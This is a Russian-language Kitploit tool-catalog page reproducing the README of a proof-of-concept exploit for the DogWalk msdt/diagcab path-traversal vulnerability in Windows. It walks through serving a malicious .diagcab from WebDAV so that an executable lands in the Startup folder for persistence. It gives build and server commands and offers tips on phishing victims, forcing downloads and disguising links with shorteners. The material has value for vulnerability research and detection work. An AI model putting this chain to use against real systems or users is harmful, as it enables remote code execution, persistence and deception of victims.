Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DogWalk-rce-poc — 🐾Dogwalk PoC (использование diagcab-файла для получения RCE на Windows) | Kitploit
Инструменты/GitHubGitHub/ariary/dogwalk-rce-poc
Генерация полезной нагрузкиМеханизмы персистентностиЭксплуатацияТестирование на Проникновение
GitHubariary/dogwalk-rce-poc

DogWalk-rce-poc

🐾Dogwalk PoC (использование diagcab-файла для получения RCE на Windows)

Репозиторий
76144 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Dogwalk Proof-of-Concept🐾

root@kitploit:~

🚨 Предупреждение 🚨



PoC позволяет атакующему получить удалённое внедрение кода на устройстве жертвы под управлением Windows.
Цель этого репозитория — сделать PoC даже более удобным, чем <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>исходный репозиторий.
НЕ ИСПОЛЬЗУЙТЕ ЕГО БЕЗ ПРЕДВАРИТЕЛЬНОГО РАЗРЕШЕНИЯ!

Что касается нанесённого ущерба и простоты эксплуатации, надеюсь, Microsoft это исправит
Обновление за июль 2022 г.: Microsoft так и не исправила уязвимость в msdt, но Microsoft Defender может её обнаружить

  • 🧠 Как это работает
  • 🐾 Запустить
  • 📺 Покажи

Основная идея: уязвимость обхода пути (path traversal) в технологии Microsoft Diagcab (msdt), которая может привести к удалённому выполнению кода.
Полное описание можно найти в статье в блоге
Об уязвимости сообщалось в течение 2 лет (автор @irsl), и до сих пор нет исправления!

Как это работает?

Proof-of-Concept поднимает webdav-сервер, размещающий вредоносный файл .diagcab, который выполняет обход пути (path transversal), чтобы записать вредоносный исполняемый файл в C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Запись исполняемого файла в эту папку приводит к его выполнению при каждом запуске машины пользователем; это называется Boot Logon Autostart Execution.

Итак, в основном нам нужно:

  • webDAV-сервер
  • Вредоносный файл .diagcab
  • Вредоносный исполняемый файл (для PoC достаточно легитимного или обычного текстового файла)

🎬 Сценарий

  1. Жертва переходит по ссылке (фишинг, социальная инженерия или что угодно), которая загружает файл .diagcab

(💡 используйте заголовок ответа Content-type: application/octet-stream, чтобы браузер автоматически загружал файл при переходе по URL)

  1. Жертва нажимает на загруженный файл (это может легко/случайно произойти просто при клике по папке загрузок браузера)
  2. CAB-файл загружает вредоносный исполняемый файл с webdav -> (path transversal), который сохраняется в меню автозапуска
  3. Пользователь перезагружает устройство -> (RCE)

Приступим

Если вам лень (или вы спешите) выполнять шаги по порядку:

root@kitploit:~
./hurry-dogwalk.sh [WEBDAV_URL]         # need docker
# Stop the server
./hurry-dogwalk.sh --clean

Иначе ↓↓

🔨 Создаём файл .diagcab

  • Файлы .diagcfg — это простые XML-файлы, которые содержат ссылки на один или несколько диагностических пакетов и предоставляют метаинформацию о них
  • Они упаковываются в архивы Microsoft Cabinet и сохраняются с расширением .diagcab.

Сначала создайте custom.diagcfg:

root@kitploit:~
./build-malicious-diagcfg.sh --url [WEBDAV_URL]

И соберите hotfix895214.diagcab:

root@kitploit:~
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe

Наконец, переместите его в каталог ./webdav/diagcab-webdav-poc/config

🏗️ Настройка сервера

Поместите исполняемый файл, который вы хотите передать на машину жертвы, в каталог ./webdav/malicious... (Здесь мы используем классический calc.exe)

...И запустите сервер:

root@kitploit:~
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl

Вредоносный .diagcab доступен по адресу https://[WEBDAV_URL]/config/hotfix895214.diagcab. Теперь вам нужно заманить жертву, чтобы она перешла по этой ссылке.

(💡вы можете использовать сокращатель ссылок, чтобы это выглядело менее подозрительно)

👁️ Жди и смотри

Установка Dogwalk

💡 по умолчанию, похоже, webdav-взаимодействие не включено. Смотрите mitigations.txt, чтобы найти обходной путь для его работы

🐾🐾

демонстрация

Скачать инструмент